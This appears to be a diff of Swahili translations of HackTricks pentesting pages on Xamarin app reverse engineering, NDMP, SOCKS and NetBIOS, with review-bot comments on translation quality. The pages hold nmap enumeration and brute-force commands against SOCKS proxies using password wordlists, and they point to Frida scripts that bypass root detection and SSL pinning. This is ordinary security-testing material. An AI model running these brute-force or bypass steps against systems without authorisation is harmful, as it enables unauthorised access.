- Kwa **iOS**, programu zinaendeshwa chini ya utekelezaji wa Mono, ikichanganya uongofu kamili wa Mbele ya Wakati (AOT) kuwa lugha ya usanifu ya ARM kutoka kwa nambari ya C# .NET. Mchakato huu unaendesha pamoja na Utekelezaji wa Objective-C kwenye kernel kama ya UNIX.
- Kwa **Android**, Xamarin inajumuisha na Android na Java namespaces kupitia .NET bindings, ikifanya kazi ndani ya mazingira ya utekelezaji ya Mono pamoja na Android Runtime (ART). Managed Callable Wrappers (MCW) na Android Callable Wrappers (ACW) hurahisisha mawasiliano kati ya Mono na ART, zote zikiwa zimejengwa kwenye kernel ya Linux.
- Kwa **iOS**, programu zinafanya kazi chini ya Mono runtime, zikitumika kamili Ahead of Time (AOT) compilation kubadilisha C# .NET code kuwa lugha ya mkusanyiko wa ARM. Mchakato huu unafanya kazi pamoja na Objective-C Runtime kwenye kernel inayofanana na UNIX.
### .NET Runtime na Mono Framework
### .NET Runtime and Mono Framework
**Fremu ya .NET** inajumuisha vifurushi, darasa, na majina ya nafasi za maendeleo ya programu, na .NET Runtime inasimamia utekelezaji wa nambari. Inatoa uhuru wa jukwaa na utangamano wa nyuma. **Mono Framework** ni toleo huria la fremu ya .NET, ilianzishwa mwaka 2005 kuongeza .NET kwa Linux, sasa inayoungwa mkono na Microsoft na inayoongozwa na Xamarin.
**.NET framework** inajumuisha assemblies, classes, na namespaces kwa ajili ya maendeleo ya programu, huku .NET Runtime ikisimamia utekelezaji wa msimbo. Inatoa uhuru wa jukwaa na ulinganifu wa nyuma. **Mono Framework** ni toleo la chanzo wazi la .NET framework, lililoanzishwa mwaka 2005 ili kupanua .NET kwa Linux, sasa linaungwa mkono na Microsoft na kuongozwa na Xamarin.
### Kudukua Programu za Xamarin
### Reverse Engineering Xamarin Apps
#### Kudondoa Kificho cha Kukusanywa cha Xamarin
#### Decompilation of Xamarin Assemblies
Kudondoa kificho cha kukusanywa hubadilisha kificho kilichokusanywa kuwa kificho cha chanzo. Katika Windows, dirisha la Moduli katika Visual Studio linaweza kutambua moduli za kudondoa, kuruhusu upatikanaji wa moja kwa moja wa nambari ya chanzo ya mtu wa tatu na uchimbaji wa kificho cha chanzo kwa uchambuzi.
Decompilation inabadilisha msimbo ulioandikwa nyuma kuwa msimbo wa chanzo. Katika Windows, dirisha la Modules katika Visual Studio linaweza kutambua moduli za decompilation, kuruhusu ufikiaji wa moja kwa moja wa msimbo wa wahusika wengine na kutoa msimbo wa chanzo kwa ajili ya uchambuzi.
#### Kompilisheni ya JIT vs AOT
#### JIT vs AOT Compilation
- **Android** inasaidia Kompilisheni ya Mara tu-Inapo (JIT) na Kompilisheni ya Mbele ya Wakati (AOT), na hali ya Hybrid AOT kwa kasi bora ya utekelezaji. AOT kamili inapatikana tu kwa leseni za Enterprise.
- **iOS** inatumia tu Kompilisheni ya AOT kutokana na vizuizi vya Apple kwenye utekelezaji wa nambari ya kudumu.
- **Android** inasaidia Just-In-Time (JIT) na Ahead-Of-Time (AOT) compilation, ikiwa na hali ya Hybrid AOT kwa ajili ya kasi bora ya utekelezaji. AOT kamili ni ya leseni za Enterprise pekee.
- **iOS** inatumia tu AOT compilation kutokana na vizuizi vya Apple juu ya utekelezaji wa msimbo wa dynamic.
### Kuchimbua Faili za dll kutoka APK/IPA
### Extracting dll Files from APK/IPA
Ili kupata vifurushi katika APK/IPA, fungua faili na tafuta saraka za vifurushi. Kwa Android, zana kama [XamAsmUnZ](https://github.com/cihansol/XamAsmUnZ) na [xamarin-decompress](https://github.com/NickstaDB/xamarin-decompress) zinaweza kufungua faili za dll.
Ili kufikia assemblies katika APK/IPA, fungua faili na uchunguze saraka ya assemblies. Kwa Android, zana kama [XamAsmUnZ](https://github.com/cihansol/XamAsmUnZ) na [xamarin-decompress](https://github.com/NickstaDB/xamarin-decompress) zinaweza kufungua faili za dll.
```bash
python3 xamarin-decompress.py -o /path/to/decompressed/apk
```
Kwa blobs za mkutano katika Android, [pyxamstore](https://github.com/jakev/pyxamstore) inaweza kuzifungua.
Kwa assembly blobs katika Android, [pyxamstore](https://github.com/jakev/pyxamstore) inaweza kuyafungua.
```bash
pyxamstore unpack -d /path/to/decompressed/apk/assemblies/
```
Faili za dll za iOS zinapatikana kwa urahisi kwa decompilation, zikifunua sehemu kubwa ya nambari ya programu, ambayo mara nyingi inashiriki msingi wa kawaida kati ya jukwaa tofauti.
iOS dll files zinapatikana kwa urahisi kwa ajili ya decompilation, zikifunua sehemu kubwa za msimbo wa programu, ambayo mara nyingi inashiriki msingi wa kawaida katika majukwaa tofauti.
### Uchambuzi wa Kudumu
### Uchambuzi wa Kijadi
Uchambuzi wa kudumu unahusisha ukaguzi wa SSL pinning na matumizi ya zana kama [Fridax](https://github.com/NorthwaveSecurity/fridax) kwa marekebisho ya wakati wa kukimbia ya .NET binary katika programu za Xamarin. Skrini za Frida zinapatikana kwa kuzidisha ugunduzi wa root au SSL pinning, kuongeza uwezo wa uchambuzi.
Uchambuzi wa kijadi unahusisha kuangalia kwa SSL pinning na kutumia zana kama [Fridax](https://github.com/NorthwaveSecurity/fridax) kwa mabadiliko ya wakati wa kukimbia ya .NET binary katika programu za Xamarin. Skripti za Frida zinapatikana ili kupita ugunduzi wa root au SSL pinning, zikiongeza uwezo wa uchambuzi.
Skrini nyingine za Frida za kuvutia:
Skripti nyingine za Frida zinazovutia:
* [**xamarin-antiroot**](https://codeshare.frida.re/@Gand3lf/xamarin-antiroot/)
* [**xamarin-root-detect-bypass**](https://codeshare.frida.re/@nuschpl/xamarin-root-detect-bypass/)
* [**Frida-xamarin-unpin**](https://github.com/GoSecure/frida-xamarin-unpin)
## Taarifa Zaidi
## Taarifa zaidi
* [https://www.appknox.com/security/xamarin-reverse-engineering-a-guide-for-penetration-testers](https://www.appknox.com/security/xamarin-reverse-engineering-a-guide-for-penetration-testers)
* [https://thecobraden.com/posts/unpacking\_xamarin\_assembly\_stores/](https://thecobraden.com/posts/unpacking\_xamarin\_assembly\_stores/)
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa katika HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
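Review bot: "### Uchambuzi wa Kijadi" means "traditional analysis", but the section covers runtime instrumentation with Frida and Fridax, i.e. dynamic analysis; this commit renders the term as "dinamik" elsewhere ("mbinu za statiki na za dinamik"), so "Uchambuzi wa Kidinamiki" would be both correct and consistent. "Decompilation inabadilisha msimbo ulioandikwa nyuma" says "code written backwards" where the previous line's "kificho kilichokusanywa" (compiled code) was correct. The headings "Basic Information", "Xamarin's Architecture", ".NET Runtime and Mono Framework", "Reverse Engineering Xamarin Apps", "Decompilation of Xamarin Assemblies", "JIT vs AOT Compilation" and "Extracting dll Files from APK/IPA" are all left in English although their previous versions were translated, while "## Taarifa zaidi" stays in Swahili; the file should use one language for headings.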

@ -1,30 +1,31 @@
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
# **Taarifa za Itifaki**
# **Taarifa ya Protokali**
Kutoka [Wikipedia](https://en.wikipedia.org/wiki/NDMP):
> **NDMP**, au **Network Data Management Protocol**, ni itifaki inayolenga kusafirisha data kati ya vifaa vya uhifadhi vilivyounganishwa kwenye mtandao \([NAS](https://en.wikipedia.org/wiki/Network-attached_storage)\) na vifaa vya kuhifadhi nakala. Hii inaondoa haja ya kusafirisha data kupitia seva ya kuhifadhi nakala yenyewe, hivyo kuongeza kasi na kuondoa mzigo kwenye seva ya kuhifadhi nakala.
> **NDMP**, au **Protokali ya Usimamizi wa Takwimu za Mtandao**, ni protokali iliyokusudiwa kubeba data kati ya vifaa vya uhifadhi vilivyounganishwa kwenye mtandao \([NAS](https://en.wikipedia.org/wiki/Network-attached_storage)\) na vifaa vya [backup](https://en.wikipedia.org/wiki/Backup). Hii inondoa hitaji la kubeba data kupitia seva ya backup yenyewe, hivyo kuongeza kasi na kuondoa mzigo kutoka kwa seva ya backup.
**Bandari ya chaguo-msingi:** 10000
**Bandari ya kawaida:** 10000
```text
PORT STATE SERVICE REASON VERSION
10000/tcp open ndmp syn-ack Symantec/Veritas Backup Exec ndmp
```
# **Uthibitishaji**
# **Uhesabu**
```bash
nmap -n -sV --script "ndmp-fs-info or ndmp-version" -p 10000 <IP> #Both are default scripts
```
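Review bot: the rewritten Wikipedia quote expands NDMP as "Protokali ya Usimamizi wa Takwimu za Mtandao"; the acronym stands for the English name "Network Data Management Protocol", so the protocol name should stay untranslated as in the previous line (proper nouns and protocol names are kept as-is in the rest of this commit). "Bandari ya kawaida" (usual port) for "Bandari ya chaguo-msingi" (default port) is also a small loss of precision.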
@ -34,16 +35,17 @@ nmap -n -sV --script "ndmp-fs-info or ndmp-version" -p 10000 <IP> #Both are defa
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka mwanzo hadi kuwa bingwa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
{% endhint %}

View file

@ -1,94 +1,43 @@
# 1080 - Kupima Usalama wa Socks
# 1080 - Pentesting Socks
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inayotangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
## Taarifa Msingi
## Basic Information
**SOCKS** ni itifaki inayotumiwa kwa kuhamisha data kati ya mteja na seva kupitia proksi. Toleo la tano, **SOCKS5**, linaongeza kipengele cha uwakiki kinachoruhusu watumiaji waliothibitishwa tu kupata seva. Inashughulikia hasa kupeleka uhusiano wa TCP na kuhamisha pakiti za UDP, ikifanya kazi kwenye safu ya kikao (Safu ya 5) ya mfano wa OSI.
**SOCKS** ni protokali inayotumika kwa ajili ya kuhamasisha data kati ya mteja na seva kupitia proxy. Toleo la tano, **SOCKS5**, linaongeza kipengele cha uthibitishaji ambacho ni hiari, kinachoruhusu watumiaji walioidhinishwa pekee kufikia seva. Kimsingi inashughulikia proxying ya muunganisho wa TCP na kupeleka pakiti za UDP, ikifanya kazi katika safu ya kikao (Layer 5) ya mfano wa OSI.
**Bandari ya Chaguo-msingi:** 1080
**Default Port:** 1080
## Uchunguzi
## Enumeration
### Ukaguzi wa Uthibitishaji
### Authentication Check
```bash
nmap -p 1080 <ip> --script socks-auth-info
```
#### Matumizi ya Msukumo wa Nguvu
### Brute Force
##### Matumizi ya Msingi
Kutumia msukumo wa nguvu ni njia ya kawaida ya kuvunja nywila. Kwa kufanya jaribio la msukumo wa nguvu, unaweza kujaribu nywila tofauti kwa kuingiza moja kwa moja kwenye mfumo unaolindwa. Hii inaweza kufanyika kwa kutumia programu maalum za msukumo wa nguvu kama Hydra au Medusa.
Kwa mfano, unaweza kutumia Hydra kwa kufanya jaribio la msukumo wa nguvu kwenye seva ya SSH. Unaweza kuanzisha jaribio hili kwa kutoa orodha ya nywila zinazowezekana na jina la mtumiaji. Hydra basi itajaribu kila nywila kwenye orodha hadi itapata ile sahihi.
Kwa kufuata hatua hizi, unaweza kufanikiwa kuvunja nywila na kupata ufikiaji usioidhinishwa kwenye mfumo unaolindwa. Hata hivyo, ni muhimu kutambua kuwa matumizi ya msukumo wa nguvu yanaweza kuwa kinyume cha sheria na yanaweza kusababisha madhara makubwa. Kwa hivyo, ni muhimu kuzingatia sheria na kufanya msukumo wa nguvu tu kwa idhini ya mmiliki wa mfumo unaolindwa.
#### Matumizi ya Msingi
```bash
nmap --script socks-brute -p 1080 <ip>
```
#### Matumizi ya juu
##### Socks Proxy
A Socks proxy is a protocol that allows a client to establish a connection through a firewall by using a proxy server. It can be used to bypass network restrictions and access resources that are otherwise blocked.
###### Socks4
Socks4 is an older version of the Socks protocol that only supports TCP connections. It does not support authentication, so anyone can use it to connect to a Socks server.
###### Socks5
Socks5 is the newer version of the Socks protocol and supports both TCP and UDP connections. It also supports authentication, allowing for more secure connections. Socks5 can be used with various authentication methods, including username/password, GSSAPI, and SSL/TLS certificates.
##### Socks Proxy Chains
Socks proxy chains involve using multiple Socks proxies in a series to route traffic through different servers. This can help to further obfuscate the source of the traffic and make it more difficult to trace.
##### Socks Proxy Forwarding
Socks proxy forwarding involves forwarding traffic from a local Socks proxy to a remote Socks proxy. This can be useful in scenarios where the remote Socks proxy has access to resources that are not directly accessible from the local network.
##### Socks Proxy Tunnels
Socks proxy tunnels involve encapsulating traffic within a Socks proxy connection. This can be useful for bypassing network restrictions or for creating encrypted tunnels for secure communication.
##### Socks Proxy Wrappers
Socks proxy wrappers are tools that can be used to wrap existing applications with Socks proxy functionality. This allows the application to use a Socks proxy without requiring any modifications to the application itself.
##### Socks Proxy Tools
There are various tools available for working with Socks proxies, including proxychains, ProxyCap, and SocksCap. These tools can be used to configure and manage Socks proxies, as well as to route traffic through them.
```bash
nmap --script socks-brute --script-args userdb=users.txt,passdb=rockyou.txt,unpwdb.timelimit=30m -p 1080 <ip>
```
#### Mbinu za Kudukua Huduma za Mtandao
##### Kudukua Socks
Socks ni itifaki ya mtandao inayotumiwa kwa kuunganisha watumiaji na seva ya proxy. Inaruhusu watumiaji kufanya uhusiano wa mtandao kupitia seva ya proxy, ambayo inaweza kusaidia kuficha anwani ya IP ya mtumiaji halisi.
Kudukua Socks kunaweza kufanyika kwa njia kadhaa, ikiwa ni pamoja na:
1. Kuchunguza Socks Proxy: Unaweza kutumia zana kama Nmap au ProxyChains kuchunguza seva za Socks Proxy zinazopatikana kwenye mtandao.
2. Kudukua Socks Proxy: Mara tu unapopata seva ya Socks Proxy, unaweza kujaribu kudukua akaunti zilizopo kwenye seva hiyo kwa kutumia mbinu kama vile kujaribu nywila za kawaida, kudukua maelezo ya kuingia, au kutumia mbinu za kudukua zilizojulikana.
3. Kudukua Mawasiliano ya Socks: Unaweza kudukua mawasiliano ya Socks kwa kusikiliza trafiki ya mtandao inayopita kati ya mteja na seva ya proxy. Hii inaweza kufanyika kwa kutumia zana kama Wireshark au mitambo ya kusikiliza trafiki.
Kwa kudukua Socks, unaweza kupata ufikiaji usioidhinishwa kwa mifumo ya mtandao, kufikia rasilimali zilizozuiliwa, au kuficha anwani yako ya IP halisi. Ni muhimu kwa wataalamu wa kudukua kuelewa mbinu hizi ili kuboresha usalama wa mifumo ya mtandao.
#### Matokeo
```
PORT STATE SERVICE
1080/tcp open socks
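Review bot: the translated page now mixes languages: the support-banner bullets (`* Check the [**subscription plans**]...`, `* **Join the** 💬 ...`, `* **Share hacking tricks ...`) and the headings `## Basic Information`, `**Default Port:** 1080`, `## Enumeration`, `### Authentication Check` and `### Brute Force` are left in English while the body is Swahili; the NDMP file in this same commit renders the same banner in Swahili (`* Angalia [**mpango wa usajili**]...`), so reuse that wording here and translate the headings. Dropping the old filler paragraphs (the generic brute-force text about Hydra and SSH, the English "Socks Proxy Chains/Forwarding/Tunnels/Wrappers" list and the "Kudukua Socks" steps) is right, since none of it described the SOCKS enumeration this page covers.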
@ -98,19 +47,15 @@ PORT STATE SERVICE
| Statistics
|_ Performed 1921 guesses in 6 seconds, average tps: 320
```
## Kuchimba na Kusogeza Bandari
## Tunneling and Port Forwarding
### Matumizi ya msingi ya proxychains
### Msingi wa matumizi ya proxychains
Sanidi proxy chains kutumia socks proxy
Weka proxy chains kutumia socks proxy
```
nano /etc/proxychains4.conf
```
Edit the bottom and add your proxy
**Swahili Translation:**
Badilisha sehemu ya chini na ongeza proksi yako
Edit chini na ongeza proxy yako
```
socks5 10.10.10.10 1080
```
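Review bot: `Edit chini na ongeza proxy yako` is half English; the removed line `Badilisha sehemu ya chini na ongeza proksi yako` (or `Hariri sehemu ya chini na ongeza proxy yako`) is the correct rendering of "Edit the bottom and add your proxy". The heading change from `### Matumizi ya msingi ya proxychains` to `### Msingi wa matumizi ya proxychains` also regresses, since the new form means "the basis of proxychains usage" rather than "basic use of proxychains". Removing the stray `**Swahili Translation:**` label and the duplicated English sentence is correct.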
@ -118,18 +63,19 @@ Na uthibitisho
```
socks5 10.10.10.10 1080 username password
```
#### Taarifa zaidi: [Tunneling na Port Forwarding](../generic-methodologies-and-resources/tunneling-and-port-forwarding.md)
#### More info: [Tunneling and Port Forwarding](../generic-methodologies-and-resources/tunneling-and-port-forwarding.md)
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana katika HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **fuata** sisi kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
{% endhint %}
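Review bot: `**fuata** sisi kwenye **Twitter**` is a word-for-word calque of "follow us"; the NDMP and NetBIOS footers in this commit use `tufuatilie` (and the replaced text used `tufuate`), so pick one form for every footer. The `#### More info:` heading is also left in English while the rest of the page is Swahili.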

View file

@ -1,37 +1,38 @@
# 137,138,139 - Kupima Usalama wa NetBios
# 137,138,139 - Pentesting NetBios
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka mwanzo hadi kuwa bingwa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
## Huduma ya Jina la NetBios
## NetBios Name Service
**Huduma ya Jina la NetBIOS** inacheza jukumu muhimu, ikijumuisha huduma mbalimbali kama **usajili na ufumbuzi wa majina**, **usambazaji wa datagram**, na **huduma za kikao**, kwa kutumia bandari maalum kwa kila huduma.
**NetBIOS Name Service** ina jukumu muhimu, ikihusisha huduma mbalimbali kama vile **usajili wa majina na ufumbuzi**, **usambazaji wa datagram**, na **huduma za kikao**, ikitumia bandari maalum kwa kila huduma.
[Kutoka kwa Wikidepia](https://en.wikipedia.org/wiki/NetBIOS_over_TCP/IP):
